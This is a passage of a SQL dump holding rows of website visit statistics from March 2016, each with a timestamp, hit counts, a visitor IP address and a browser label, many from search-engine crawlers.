1,0,0,'5.255.253.51','other'),(20795,1457957959,1,1,0,0,'141.8.132.109','other'),(20796,1457957963,1,1,0,0,'178.154.189.12','other'),(20797,1457957966,1,1,0,0,'130.193.51.22','other'),(20798,1457957969,1,1,0,0,'130.193.51.81','other'),(20799,1457958016,1,1,0,0,'94.179.61.114','firefox'),(20800,1457958132,1,1,0,0,'37.53.145.36','msie'),(20801,1457958159,1,1,0,0,'62.210.215.100','chrome'),(20802,1457958200,1,1,0,0,'51.255.65.40','other'),(20803,1457958531,1,1,0,0,'95.134.13.38','chrome'),(20804,1457958697,1,1,0,0,'85.115.62.180','other'),(20805,1457958949,1,1,0,0,'91.124.16.246','chrome'),(20806,1457959529,1,1,0,0,'46.201.41.192','chrome'),(20807,1457959639,1,1,0,0,'37.53.173.188','chrome'),(20808,1457959665,1,1,0,0,'91.196.178.67','firefox'),(20809,1457959677,1,0,1,0,'66.249.66.166',''),(20810,1457959703,15,0,15,0,'66.249.66.158',''),(20811,1457959890,1,1,0,0,'66.249.92.95','other'),(20812,1457959983,1,0,1,0,'68.180.230.35',''),(20813,1457960035,1,1,0,0,'141.8.142.82','other'),(20814,1457960037,1,1,0,0,'141.8.142.55','other'),(20815,1457960040,1,1,0,0,'130.193.51.45','other'),(20816,1457960044,1,1,0,0,'141.8.132.74','other'),(20817,1457960047,1,1,0,0,'130.193.51.102','other'),(20818,1457960050,1,1,0,0,'93.158.152.65','other'),(20819,1457960053,1,1,0,0,'130.193.37.21','other'),(20820,1457960056,1,1,0,0,'93.158.152.9','other'),(20821,1457960059,1,1,0,0,'178.154.149.11','other'),(20822,1457960621,1,1,0,0,'8.29.198.25','other'),(20823,1457960642,2,2,0,0,'178.154.189.204','other'),(20824,1457960649,1,1,0,0,'37.9.122.203','other'),(20825,1457960698,1,1,0,0,'91.196.178.34','chrome'),(20826,1457961116,1,1,0,0,'89.67.240.30','other'),(20827,1457961121,1,0,1,0,'68.180.230.35',''),(20828,1457961228,1,1,0,0,'217.69.133.216','other'),(20829,1457961293,1,1,0,0,'91.196.178.66','firefox'),(20830,1457961439,1,1,0,0,'94.179.61.114','firefox'),(20831,1457961542,1,1,0,0,'91.196.178.129','chrome'),(20832,1457961592,1,0,1,0,'66.249.66.166',''),(20833,1457961599,1,1,0,0,'91.196.178.162','chrome'),(20834,1457961645,1,0,1,0,'66.249.66.158',''),(20835,1457962087,1,1,0,0,'78.111.185.64','chrome'),(20836,1457962105,1,0,1,0,'66.249.66.162',''),(20837,1457962373,1,1,0,0,'37.55.25.153','chrome'),(20838,1457962606,1,1,0,0,'91.196.178.67','chrome'),(20839,1457962783,1,1,0,0,'66.249.66.190','other'),(20840,1457962876,1,0,1,0,'66.249.66.158',''),(20841,1457962916,1,1,0,0,'66.249.66.158','other'),(20842,1457963048,2,2,0,0,'66.249.66.129','other'),(20843,1457964128,1,0,1,0,'66.249.66.158',''),(20844,1457964144,1,1,0,0,'164.132.161.85','other'),(20845,1457964157,1,1,0,0,'217.69.133.225','other'),(20846,1457964340,1,1,0,0,'91.196.178.68','firefox'),(20847,1457964487,4,4,0,0,'66.249.66.129','other'),(20848,1457964520,2,1,1,0,'66.249.66.162',''),(20849,1457964586,2,1,1,0,'66.249.66.158',''),(20850,1457964675,1,1,0,0,'66.249.66.133','other'),(20851,1457965129,1,1,0,0,'164.132.161.42','other'),(20852,1457965134,2,2,0,0,'37.53.90.175','chrome'),(20853,1457965315,3,3,0,0,'66.249.66.162','other'),(20854,1457965430,2,2,0,0,'141.8.184.18','other'),(20855,1457965579,1,1,0,0,'195.69.223.54','firefox'),(20856,1457965817,1,1,0,0,'51.255.65.55','other'),(20857,1457966143,1,1,0,0,'157.55.39.252','other'),(20858,1457966151,1,1,0,0,'51.255.65.21','other'),(20859,1457966614,1,0,1,0,'68.180.230.35',''),(20860,1457966623,3,1,2,0,'66.249.66.162',''),(20861,1457966725,1,1,0,0,'51.255.65.14','other'),(20862,1457966731,1,1,0,0,'217.69.133.67','other'),(20863,1457966732,1,1,0,0,'217.69.133.85','other'),(20864,1457966911,1,0,1,0,'66.249.66.166',''),(20865,1457967009,4,0,4,0,'66.249.66.158',''),(20866,1457967020,1,1,0,0,'31.43.61.28','chrome'),(20867,1457967430,1,1,0,0,'91.196.178.166','chrome'),(20868,1457967580,1,1,0,0,'66.249.93.90','chrome'),(20869,1457967744,1,1,0,0,'94.179.108.205','firefox'),(20870,1457967776,1,0,1,0,'68.180.230.35',''),(20871,1457967883,1,1,0,0,'91.196.178.71','firefox'),(20872,1457968335,1,1,0,0,'66.249.66.162','other'),(20873,1457968677,1,0,1,0,'66.249.66.158',''),(20874,1457968790,1,1,0,0,'66.249.66.133','other'),(20875,1457968849,1,1,0,0,'62.210.215.100','chrome'),(20876,1457969259,4,4,0,0,'141.8.183.14','other'),(20877,1457969262,4,4,0,0,'178.154.149.11','other'),(20878,1457969266,7,7,0,0,'141.8.184.18','other'),(20879,1457969481,1,1,0,0,'66.249.66.162','other'),(20880,1457969499,3,3,0,0,'93.158.152.9','other'),(20881,1457969710,2,2,0,0,'5.255.253.53','other'),(20882,1457969906,1,1,0,0,'217.69.133.225','other'),(20883,1457970126,1,1,0,0,'217.69.133.226','other'),(20885,1457970185,6,6,0,0,'178.154.149.11','other'),(20886,1457970230,4,4,0,0,'141.8.184.18','other'),(20887,1457970286,2,0,2,0,'68.180.230.35',''),(20888,1457970325,4,4,0,0,'174.34.135.242','other'),(20889,1457970329,4,4,0,0,'141.8.183.14','other'),(20890,1457970620,2,2,0,0,'66.249.66.162','other'),(20891,1457970710,1,1,0,0,'66.249.66.166','other'),(20892,1457970821,7,7,0,0,'141.8.132.99','other'),(20893,1457970826,2,2,0,0,'5.255.253.100','other'),(20894,1457970973,1,1,0,0,'217.69.133.217','other'),(20895,1457971147,14,14,0,0,'178.154.149.11','other'),(20896,1457971188,15,15,0,0,'141.8.184.18','other'),(20897,1457971221,1,1,0,0,'66.249.92.99','other'),(20898,1457971320,5,5,0,0,'130.193.37.21','other'),(20899,1457971362,6,6,0,0,'141.8.183.14','other'),(20900,1457971467,3,3,0,0,'93.158.152.9','other'),(20901,1457971604,2,2,0,0,'130.193.51.45','other'),(20902,1457971645,5,5,0,0,'5.255.253.53','other'),(20903,1457971688,2,0,2,0,'68.180.230.35',''),(20904,1457971866,1,1,0,0,'8.29.198.25','other'),(20905,1457972034,1,1,0,0,'217.69.133.219','other'),(20906,1457972035,2,2,0,0,'66.249.66.158','other'),(20907,1457972372,1,1,0,0,'95.135.0.201','chrome'),(20908,1457972438,1,0,1,0,'66.249.66.166',''),(20909,1457972770,1,1,0,0,'91.196.178.69','firefox'),(20910,1457972796,1,1,0,0,'217.69.133.67','other'),(20911,1457972797,1,1,0,0,'217.69.133.218','other'),(20912,1457972832,2,2,0,0,'66.249.66.166','other'),(20913,1457973028,4,4,0,0,'66.249.66.162','other'),(20914,1457973228,1,1,0,0,'66.249.66.158','other'),(20915,1457973842,1,1,0,0,'133.130.63.178','chrome'),(20916,1457974127,1,0,1,0,'68.180.230.35',''),(20917,1457974153,1,0,1,0,'66.249.66.166',''),(20918,1457974164,13,0,13,0,'66.249.66.158',''),(20919,1457974393,1,0,1,0,'66.249.66.133',''),(20920,1457974499,1,1,0,0,'46.16.121.135','firefox'),(20921,1457974616,2,1,1,0,'66.249.66.158',''),(20922,1457974948,2,2,0,0,'66.249.66.158','other'),(20923,1457975216,1,1,0,0,'157.55.39.252','other'),(20924,1457975365,1,1,0,0,'164.132.161.16','other'),(20925,1457975444,3,3,0,0,'66.249.66.166','other'),(20926,1457975742,2,2,0,0,'66.249.66.162','other'),(20927,1457975883,1,1,0,0,'141.8.183.14','other'),(20928,1457975908,1,1,0,0,'66.249.66.158','other'),(20929,1457976687,1,1,0,0,'141.0.13.214','chrome'),(20930,1457977104,1,0,1,0,'66.249.66.166',''),(20931,1457977226,1,0,1,0,'66.249.66.162',''),(20932,1457977231,2,2,0,0,'66.249.66.162','other'),(20933,1457977287,1,1,0,0,'221.133.44.164','firefox'),(20934,1457977583,1,1,0,0,'217.69.133.215','other'),(20935,1457977627,2,0,2,0,'68.180.230.35',''),(20936,1457977679,1,1,0,0,'91.196.178.39','firefox'),(20937,1457978043,1,1,0,0,'217.69.133.218','other'),(20939,1457978071,1,1,0,0,'51.255.65.31','other'),(20940,1457978143,1,1,0,0,'164.132.161.59','other'),(20941,1457978206,1,1,0,0,'207.46.13.188','other'),(20942,1457978317,1,0,1,0,'66.249.66.158',''),(20943,1457978490,1,1,0,0,'66.249.66.166','other'),(20944,1457978593,4,4,0,0,'66.249.66.158','other'),(20945,1457978821,3,2,1,0,'66.249.66.162',''),(20946,1457979285,1,1,0,0,'66.249.79.188','other'),(20947,1457979695,1,1,0,0,'164.132.161.55','other'),(20948,1457979932,2,0,2,0,'68.180.230.35',''),(20949,1457980046,2,2,0,0,'66.249.66.158','other'),(20950,1457980512,1,1,0,0,'40.77.167.51','other'),(20951,1457980547,2,1,1,0,'66.249.66.162',''),(20952,1457980708,2,1,1,0,'66.249.66.162',''),(20953,1457980723,1,1,0,0,'164.132.161.60','other'),(20954,1457981019,4,0,4,0,'68.180.230.35',''),(20955,1457981271,2,2,0,0,'66.249.66.158','other'),(20956,1457981509,1,1,0,0,'180.76.15.23','other'),(20957,1457981551,1,1,0,0,'66.249.92.99','other'),(20958,1457981570,1,1,0,0,'180.76.15.159','other'),(20959,1457981729,1,1,0,0,'217.69.133.222','other'),(20960,1457982232,2,2,0,0,'66.249.66.158','other'),(20961,1457982371,1,0,1,0,'66.249.66.162',''),(20962,1457982502,1,1,0,0,'207.46.13.192','other'),(20963,1457982785,1,1,0,0,'8.29.198.25','other'),(20964,1457983311,1,0,1,0,'66.249.66.166',''),(20965,1457983340,1,1,0,0,'91.124.182.203','firefox'),(20966,1457983370,1,1,0,0,'66.249.93.94','chrome'),(20967,1457983389,1,1,0,0,'91.196.179.69','chrome'),(20968,1457983579,1,0,1,0,'68.180.230.35',''),(20969,1457983722,1,1,0,0,'217.69.133.216','other'),(20970,1457983863,1,1,0,0,'207.46.13.192','other'),(20971,1457984008,1,0,1,0,'66.249.66.129',''),(20972,1457984381,2,0,2,0,'66.249.66.166',''),(20973,1457984742,2,0,2,0,'66.249.66.162',''),(20974,1457985169,2,0,2,0,'68.180.230.35',''),(20975,1457985712,1,1,0,0,'95.158.42.243','chrome'),(20976,1457985970,1,1,0,0,'66.249.66.129','other'),(20977,1457986002,4,3,1,0,'66.249.66.162',''),(20978,1457986037,2,2,0,0,'66.249.66.190','other'),(20979,1457986100,1,1,0,0,'66.249.66.133','other'),(20980,1457986194,1,1,0,0,'66.249.66.158','other'),(20981,1457986423,3,3,0,0,'207.46.13.188','other'),(20982,1457986931,1,1,0,0,'178.93.149.77','chrome'),(20983,1457986958,1,1,0,0,'51.255.65.34','other'),(20984,1457987020,1,1,0,0,'213.179.252.143','chrome'),(20985,1457987152,2,0,2,0,'66.249.66.162',''),(20986,1457987321,1,1,0,0,'91.124.182.203','firefox'),(20987,1457987839,1,1,0,0,'217.69.133.218','other'),(20988,1457987901,1,1,0,0,'37.9.122.202','other'),(20989,1457988102,1,1,0,0,'207.46.13.188','other'),(20990,1457988237,2,0,2,0,'66.249.66.166',''),(20991,1457989012,1,1,0,0,'217.69.133.67','other'),(20993,1457989304,1,1,0,0,'51.255.65.9','other'),(20994,1457989736,1,0,1,0,'66.249.66.166',''),(20995,1457989880,1,1,0,0,'141.8.184.18','other'),(20996,1457989883,1,1,0,0,'5.255.253.53','other'),(20997,1457989887,1,1,0,0,'141.8.183.14','other'),(20998,1457990226,1,1,0,0,'66.249.66.166','other'),(20999,1457990415,3,0,3,0,'66.249.66.162',''),(21000,1457990537,2,2,0,0,'195.12.57.97','chrome'),(21001,1457990542,1,0,1,0,'68.180.230.35',''),(21002,1457990717,1,1,0,0,'91.196.178.166','chrome'),(21003,1457991011,5,5,0,0,'178.154.149.11','other'),(21004,1457991073,6,6,0,0,'141.8.184.18','other'),(21005,1457991077,4,4,0,0,'5.255.253.53','other'),(21006,1457991081,1,1,0,0,'141.8.132.99','other'),(21007,1457991101,4,0,4,0,'66.249.66.158',''),(21008,1457991148,2,2,0,0,'93.158.152.9','other'),(21009,1457991286,2,2,0,0,'130.193.51.43','other'),(21010,1457991464,1,1,0,0,'130.193.37.21','other'),(21011,1457991469,1,1,0,0,'141.8.183.14','other'),(21012,1457991766,1,0,1,0,'66.249.66.129',''),(21013,1457992006,1,1,0,0,'37.55.251.90','chrome'),(21014,1457992015,1,0,1,0,'66.249.66.158',''),(21015,1457992402,1,0,1,0,'68.180.230.35',''),(21016,1457992647,1,1,0,0,'207.46.13.192','other'),(21017,1457992691,1,1,0,0,'66.249.92.103','other'),(21018,1457993032,1,1,0,0,'141.8.142.41','other'),(21019,1457993040,1,1,0,0,'130.193.51.45','other'),(21020,1457993044,1,1,0,0,'141.8.184.31','other'),(21021,1457993063,1,1,0,0,'217.69.133.215','other'),(21022,1457993072,1,1,0,0,'141.8.184.11','other'),(21023,1457993144,1,1,0,0,'5.255.253.110','other'),(21024,1457993147,7,7,0,0,'178.154.149.11','other'),(21025,1457993166,1,1,0,0,'130.193.37.21','other'),(21026,1457993169,1,1,0,0,'141.8.132.2','other'),(21027,1457993206,14,14,0,0,'141.8.184.18','other'),(21028,1457993301,2,2,0,0,'141.8.183.14','other'),(21029,1457993366,2,2,0,0,'217.69.133.219','other'),(21030,1457993447,1,0,1,0,'66.249.66.158',''),(21031,1457993637,1,1,0,0,'8.29.198.26','other'),(21032,1457994097,1,1,0,0,'217.69.133.218','other'),(21033,1457994313,1,1,0,0,'180.76.15.22','other'),(21034,1457994487,1,0,1,0,'66.249.66.158',''),(21035,1457994938,1,1,0,0,'164.132.161.65','other'),(21036,1457994986,1,1,0,0,'51.255.65.57','other'),(21037,1457995026,1,0,1,0,'66.249.66.162',''),(21038,1457995175,1,1,0,0,'164.132.161.11','other'),(21039,1457995485,1,0,1,0,'68.180.230.35',''),(21040,1457996741,1,0,1,0,'68.180.230.35',''),(21041,1457997321,1,1,0,0,'51.255.65.52','other'),(21042,1457997543,1,0,1,0,'66.249.66.166',''),(21043,1457997622,1,1,0,0,'40.77.167.51','other'),(21044,1457997650,1,1,0,0,'217.69.133.224','other'),(21045,1457997651,2,2,0,0,'157.55.39.121','other'),(21046,1457997849,2,0,2,0,'66.249.66.158',''),(21047,1457998221,1,1,0,0,'164.132.161.10','other'),(21048,1457998752,1,1,0,0,'51.255.65.14','other'),(21049,1457999008,1,1,0,0,'207.46.13.63','other'),(21050,1457999038,3,3,0,0,'157.55.39.121','other'),(21051,1457999077,1,1,0,0,'217.69.133.84','other'),(21052,1457999431,3,3,0,0,'144.76.93.46','other'),(21053,1457999487,1,1,0,0,'207.46.13.192','other'),(21054,1457999791,1,1,0,0,'164.132.161.50','other'),(21055,1457999890,2,0,2,0,'66.249.66.158',''),(21056,1457999977,2,2,0,0,'93.158.152.9','other'),(21057,1457999978,2,2,0,0,'141.8.184.18','other'),(21059,1457999979,1,1,0,0,'141.8.132.99','other'),(21060,1457999981,1,1,0,0,'141.8.183.14','other'),(21061,1458000273,1,0,1,0,'66.249.66.162',''),(21062,1458000289,1,1,0,0,'51.255.65.69','other'),(21063,1458001083,1,1,0,0,'51.255.65.9','other'),(21064,1458001092,1,0,1,0,'66.249.66.158',''),(21065,1458001100,16,15,1,0,'66.249.66.158',''),(21066,1458001134,1,1,0,0,'66.249.66.129','other'),(21067,1458001195,1,1,0,0,'51.255.65.83','other'),(21068,1458001581,1,0,1,0,'68.180.230.35',''),(21069,1458001658,1,1,0,0,'164.132.161.87','other'),(21070,1458001731,1,1,0,0,'51.255.65.25','other'),(21071,1458002087,1,0,1,0,'66.249.66.158',''),(21072,1458002229,1,1,0,0,'40.77.167.51','other'),(21073,1458002275,1,1,0,0,'157.55.39.121','other'),(21074,1458002930,1,1,0,0,'66.249.92.103','other'),(21075,1458002954,1,0,1,0,'68.180.230.35',''),(21076,1458003414,1,1,0,0,'207.46.13.192','other'),(21077,1458003472,1,1,0,0,'157.55.39.121','other'),(21078,1458003688,1,1,0,0,'164.132.161.5','other'),(21079,1458004122,1,1,0,0,'40.77.167.51','other'),(21080,1458004138,2,1,1,0,'66.249.66.162',''),(21081,1458004406,1,1,0,0,'178.154.189.204','other'),(21082,1458004477,1,1,0,0,'8.29.198.25','other'),(21083,1458004487,1,1,0,0,'164.132.161.54','other'),(21084,1458004564,1,0,1,0,'66.249.66.129',''),(21085,1458004567,1,1,0,0,'217.69.133.218','other'),(21086,1458004623,1,0,1,0,'66.249.66.158',''),(21087,1458005820,1,0,1,0,'68.180.230.35',''),(21088,1458006732,2,0,2,0,'66.249.66.162',''),(21089,1458006994,1,1,0,0,'180.76.15.162','other'),(21090,1458007061,1,1,0,0,'141.8.142.82','other'),(21092,1458007062,1,1,0,0,'5.255.253.100','other'),(21093,1458007063,1,1,0,0,'180.76.15.144','other'),(21094,1458007064,1,1,0,0,'130.193.51.45','other'),(21096,1458007065,1,1,0,0,'141.8.132.2','other'),(21098,1458007178,1,0,1,0,'66.249.66.166',''),(21099,1458007347,1,1,0,0,'141.8.142.88','other'),(21101,1458007348,1,1,0,0,'5.255.253.55','other'),(21102,1458007354,1,1,0,0,'207.46.13.63','other'),(21103,1458007983,2,1,1,0,'66.249.66.158',''),(21104,1458008283,2,2,0,0,'66.249.66.166','other'),(21105,1458008535,1,1,0,0,'212.83.177.193','other'),(21106,1458008679,1,1,0,0,'66.249.66.190','other'),(21107,1458009015,1,1,0,0,'164.132.161.18','other'),(21108,1458009074,1,1,0,0,'207.46.13.192','other'),(21109,1458009243,1,1,0,0,'66.249.66.162','other'),(21110,1458009244,1,1,0,0,'117.135.251.134','chrome'),(21111,1458009246,1,1,0,0,'120.198.231.23','chrome'),(21112,1458009249,1,1,0,0,'120.198.231.22','chrome'),(21113,1458009279,1,1,0,0,'66.249.66.158','other'),(21114,1458009669,2,2,0,0,'66.249.66.133','other'),(21115,1458009863,1,0,1,0,'68.180.230.35',''),(21116,1458010186,3,1,2,0,'66.249.66.166',''),(21117,1458010478,1,1,0,0,'66.249.66.190','other'),(21118,1458010845,1,1,0,0,'217.69.133.218','other'),(21119,1458010860,1,1,0,0,'51.255.65.18','other'),(21120,1458011320,1,1,0,0,'217.69.133.219','other'),(21121,1458012120,1,1,0,0,'164.132.161.94','other'),(21122,1458012357,1,1,0,0,'157.55.39.121','other'),(21123,1458012473,2,1,1,0,'66.249.66.158',''),(21124,1458012482,1,0,1,0,'66.249.66.162',''),(21125,1458012497,1,1,0,0,'66.249.66.162','other'),(21126,1458012828,1,1,0,0,'51.255.65.66','other'),(21127,1458013311,1,1,0,0,'66.249.92.103','other'),(21128,1458013580,1,0,1,0,'68.180.230.35',''),(21129,1458014065,1,0,1,0,'66.249.66.190',''),(21130,1458014167,1,0,1,0,'66.249.66.166',''),(21131,1458014280,3,3,0,0,'66.249.66.162','other'),(21132,1458014360,1,1,0,0,'180.76.15.27','other'),(21133,1458014557,1,1,0,0,'51.255.65.22','other'),(21134,1458014587,1,0,1,0,'66.249.66.158',''),(21135,1458014932,1,1,0,0,'157.55.39.121','other'),(21136,1458015000,1,1,0,0,'66.249.66.129','other'),(21137,1458015260,1,1,0,0,'217.69.133.218','other'),(21138,1458015319,1,1,0,0,'8.29.198.26','other'),(21139,1458015484,1,0,1,0,'66.249.66.166',''),(21140,1458015727,3,0,3,0,'66.249.66.158',''),(21141,1458015729,3,3,0,0,'46.4.32.75','other'),(21142,1458015927,1,0,1,0,'66.249.66.162',''),(21143,1458016396,1,0,1,0,'66.249.66.190',''),(21144,1458016602,2,1,1,0,'66.249.66.162',''),(21145,1458016999,2,0,2,0,'66.249.66.166',''),(21146,1458017072,1,1,0,0,'217.69.133.84','other'),(21147,1458017073,1,1,0,0,'217.69.133.219','other'),(21148,1458017103,1,1,0,0,'94.154.239.69','other'),(21149,1458017160,1,1,0,0,'178.92.22.26','chrome'),(21150,1458017272,1,0,1,0,'66.249.66.133',''),(21151,1458017392,3,3,0,0,'66.249.66.158','other'),(21152,1458017653,3,3,0,0,'66.249.66.162','other'),(21153,1458018320,2,0,2,0,'68.180.230.35',''),(21154,1458018378,1,1,0,0,'180.76.15.23','other'),(21155,1458018673,2,2,0,0,'66.249.66.162','other'),(21156,1458018803,2,1,1,0,'66.249.66.158',''),(21157,1458018961,2,2,0,0,'80.91.162.99','other'),(21158,1458019186,2,2,0,0,'66.249.66.158','other'),(21159,1458019636,1,1,0,0,'66.249.66.162','other'),(21160,1458020388,1,1,0,0,'180.76.15.156','other'),(21161,1458020615,1,1,0,0,'217.69.133.219','other'),(21162,1458020627,1,1,0,0,'217.69.133.221','other'),(21163,1458020632,1,1,0,0,'66.249.66.158','other'),(21164,1458021029,2,2,0,0,'91.196.178.67','chrome'),(21165,1458021246,1,1,0,0,'217.69.133.85','other'),(21166,1458021879,1,1,0,0,'217.69.133.219','other'),(21167,1458022384,1,1,0,0,'217.69.133.218','other'),(21169,1458022461,1,0,1,0,'66.249.66.166',''),(21170,1458022492,1,1,0,0,'207.46.13.80','other'),(21171,1458022687,2,1,1,0,'66.249.66.166',''),(21172,1458022971,1,0,1,0,'68.180.230.35',''),(21173,1458023181,1,0,1,0,'66.249.66.158',''),(21174,1458024410,3,3,0,0,'92.236.71.145','other'),(21175,1458024482,1,1,0,0,'66.249.92.95','other'),(21176,1458024483,1,1,0,0,'91.196.179.69','chrome'),(21177,1458024556,2,2,0,0,'95.133.0.180','chrome'),(21178,1458024715,1,1,0,0,'66.249.66.162','other'),(21179,1458024757,1,0,1,0,'66.249.66.158',''),(21180,1458024840,1,1,0,0,'94.179.23.114','firefox'),(21181,1458024932,1,1,0,0,'217.69.133.224','other'),(21182,1458025126,24,24,0,0,'207.46.13.63','other'),(21183,1458025156,16,16,0,0,'207.46.13.192','other'),(21184,1458025235,17,17,0,0,'40.77.167.51','other'),(21185,1458025273,16,16,0,0,'207.46.13.80','other'),(21186,1458025926,1,1,0,0,'91.196.179.69','chrome'),(21187,1458026112,1,1,0,0,'217.69.133.218','other'),(21188,1458026149,1,1,0,0,'8.29.198.25','other'),(21189,1458026391,1,1,0,0,'217.69.133.249','other'),(21190,1458026411,1,1,0,0,'78.111.185.24','firefox'),(21191,1458026639,3,0,3,0,'66.249.66.158',''),(21192,1458026746,1,0,1,0,'68.180.230.35',''),(21193,1458026828,1,0,1,0,'66.249.66.190',''),(21194,1458026979,1,1,0,0,'130.193.37.21','other'),(21195,1458027177,102,102,0,0,'82.193.127.15','other'),(21196,1458028273,1,1,0,0,'89.38.150.47','chrome'),(21197,1458028310,1,1,0,0,'94.179.105.230','firefox'),(21198,1458028320,1,1,0,0,'91.196.178.165','firefox'),(21199,1458028471,1,0,1,0,'68.180.230.35',''),(21200,1458028503,5,5,0,0,'144.76.8.132','other'),(21201,1458028717,1,1,0,0,'213.108.45.36','chrome'),(21202,1458028757,1,1,0,0,'78.111.190.8','chrome'),(21203,1458028892,4,4,0,0,'82.193.127.15','other'),(21204,1458029177,6,3,3,0,'66.249.66.158',''),(21205,1458029241,1,1,0,0,'66.249.66.162','other'),(21206,1458029401,1,1,0,0,'178.94.249.154','chrome'),(21207,1458029439,2,2,0,0,'91.196.178.65','chrome'),(21208,1458029982,1,1,0,0,'91.196.178.71','firefox'),(21209,1458030766,1,0,1,0,'66.249.66.158',''),(21210,1458031088,1,1,0,0,'40.77.167.51','other'),(21211,1458031100,1,1,0,0,'178.154.149.11','other'),(21212,1458031143,1,0,1,0,'66.249.66.162',''),(21213,1458031190,1,1,0,0,'66.249.66.133','other'),(21214,1458031222,1,0,1,0,'68.180.230.35',''),(21215,1458031577,1,1,0,0,'217.69.133.220','other'),(21216,1458031879,1,1,0,0,'180.76.15.20','other'),(21217,1458031898,1,1,0,0,'37.52.134.129','chrome'),(21218,1458031936,1,1,0,0,'180.76.15.10','other'),(21219,1458032210,2,2,0,0,'66.249.66.162','other'),(21220,1458032300,1,1,0,0,'91.196.178.169','chrome'),(21221,1458033031,1,1,0,0,'78.111.185.123','firefox'),(21222,1458033055,1,0,1,0,'66.249.66.158',''),(21223,1458034034,1,1,0,0,'46.164.155.92','chrome'),(21224,1458034049,1,1,0,0,'5.255.253.53','other'),(21225,1458034624,1,1,0,0,'91.196.178.135','chrome'),(21226,1458034878,1,1,0,0,'207.46.13.80','other'),(21227,1458034891,1,1,0,0,'177.75.16.71','other'),(21228,1458035352,3,0,3,0,'68.180.230.35',''),(21229,1458035561,1,1,0,0,'66.249.92.99','other'),(21230,1458036184,1,1,0,0,'91.250.59.156','chrome'),(21231,1458036191,1,1,0,0,'91.196.178.135','chrome'),(21232,1458036375,3,0,3,0,'66.249.66.158',''),(21233,1458036581,1,0,1,0,'68.180.230.35',''),(21234,1458036676,2,0,2,0,'66.249.66.166',''),(21235,1458036744,1,1,0,0,'217.69.133.221','other'),(21236,1458037044,1,1,0,0,'91.196.178.136','firefox'),(21237,1458037163,1,0,1,0,'66.249.66.162',''),(21238,1458037170,1,1,0,0,'8.29.198.26','other'),(21239,1458037190,1,1,0,0,'91.196.178.65','chrome'),(21240,1458037196,1,1,0,0,'217.69.133.85','other'),(21241,1458037491,1,1,0,0,'217.69.133.67','other'),(21242,1458037542,1,1,0,0,'78.111.185.123','firefox'),(21243,1458037732,2,0,2,0,'68.180.230.35',''),(21244,1458037771,2,2,0,0,'94.179.88.132','chrome'),(21245,1458038532,1,1,0,0,'91.196.178.136','firefox'),(21246,1458038652,1,0,1,0,'66.249.66.158',''),(21247,1458038720,1,1,0,0,'207.46.13.192','other'),(21248,1458038738,1,1,0,0,'217.69.133.217','other'),(21249,1458038803,1,1,0,0,'157.55.39.32','other'),(21250,1458038819,1,0,1,0,'68.180.230.35',''),(21251,1458038973,4,3,1,0,'66.249.66.158',''),(21252,1458039003,1,1,0,0,'66.249.66.133','other'),(21253,1458039057,3,3,0,0,'66.249.66.162','other'),(21254,1458039196,11,8,3,0,'66.249.66.158',''),(21255,1458039308,1,1,0,0,'40.78.146.128','other'),(21256,1458039548,1,1,0,0,'91.196.178.67','chrome'),(21257,1458039852,46,46,0,0,'83.218.232.238','other'),(21258,1458040035,1,1,0,0,'207.46.13.80','other'),(21259,1458040141,2,2,0,0,'80.91.162.99','other'),(21260,1458040257,1,0,1,0,'66.249.66.158',''),(21261,1458040316,2,2,0,0,'141.8.183.14','other'),(21262,1458040353,1,1,0,0,'78.111.185.123','firefox'),(21263,1458040901,2,0,2,0,'66.249.66.162',''),(21264,1458040954,1,1,0,0,'5.255.253.100','other'),(21265,1458041253,6,0,6,0,'66.249.66.158',''),(21266,1458041378,1,1,0,0,'207.46.13.192','other'),(21267,1458041878,1,1,0,0,'91.250.41.130','firefox'),(21268,1458041935,1,1,0,0,'130.193.37.21','other'),(21269,1458041936,1,1,0,0,'141.8.132.99','other'),(21270,1458041939,1,1,0,0,'130.193.51.43','other'),(21271,1458041940,1,1,0,0,'130.193.51.45','other'),(21272,1458041943,1,1,0,0,'5.255.253.10','other'),(21273,1458042113,1,1,0,0,'178.93.62.78','firefox'),(21274,1458042259,2,0,2,0,'68.180.230.35',''),(21275,1458042395,1,1,0,0,'37.55.25.153','chrome'),(21276,1458042480,1,1,0,0,'217.69.133.67','other'),(21277,1458042539,1,1,0,0,'91.196.178.131','firefox'),(21278,1458042639,2,2,0,0,'91.196.178.72','firefox'),(21279,1458042650,3,0,3,0,'66.249.66.158',''),(21280,1458042675,1,1,0,0,'95.135.45.128','chrome'),(21281,1458042920,1,1,0,0,'141.8.184.18','other'),(21282,1458043111,1,1,0,0,'51.255.65.47','other'),(21283,1458043447,1,1,0,0,'212.90.183.78','firefox'),(21284,1458043485,1,1,0,0,'91.196.178.71','firefox'),(21285,1458043812,1,1,0,0,'130.193.51.45','other'),(21286,1458043894,1,0,1,0,'68.180.230.35',''),(21287,1458043941,1,1,0,0,'141.8.183.14','other'),(21288,1458043945,1,1,0,0,'178.154.149.11','other'),(21289,1458043950,1,1,0,0,'5.255.253.53','other'),(21290,1458043962,2,2,0,0,'130.193.37.21','other'),(21291,1458043969,1,1,0,0,'217.69.133.84','other'),(21292,1458044045,2,2,0,0,'141.8.184.18','other'),(21294,1458044276,1,1,0,0,'207.46.13.63','other'),(21295,1458044585,1,0,1,0,'66.249.66.158',''),(21296,1458044681,1,1,0,0,'62.210.215.100','chrome'),(21297,1458044720,1,1,0,0,'207.46.13.80','other'),(21298,1458044830,1,0,1,0,'66.249.66.162',''),(21299,1458045099,1,1,0,0,'178.154.149.11','other'),(21300,1458045368,1,1,0,0,'91.196.178.72','firefox'),(21301,1458045777,2,2,0,0,'207.46.13.192','other'),(21302,1458045810,1,0,1,0,'66.249.66.166',''),(21303,1458045934,6,6,0,0,'141.8.184.18','other'),(21304,1458045939,3,3,0,0,'183.5.116.72','other'),(21305,1458046120,1,1,0,0,'66.249.92.103','other'),(21306,1458046236,1,1,0,0,'46.174.241.119','firefox'),(21307,1458046504,1,1,0,0,'62.210.215.100','chrome'),(21308,1458046524,1,1,0,0,'95.133.177.111','firefox'),(21309,1458046623,1,1,0,0,'89.38.150.47','chrome'),(21310,1458046652,7,7,0,0,'178.154.149.11','other'),(21311,1458046700,1,1,0,0,'141.8.183.14','other'),(21312,1458046739,2,2,0,0,'130.193.37.21','other'),(21313,1458046747,4,4,0,0,'93.158.152.9','other'),(21314,1458046821,1,1,0,0,'141.8.132.99','other'),(21315,1458046831,1,1,0,0,'5.255.253.89','other'),(21316,1458046845,1,1,0,0,'141.8.184.18','other'),(21317,1458047033,1,1,0,0,'136.243.48.85','chrome'),(21318,1458047190,1,0,1,0,'66.249.66.133',''),(21319,1458047256,1,1,0,0,'51.255.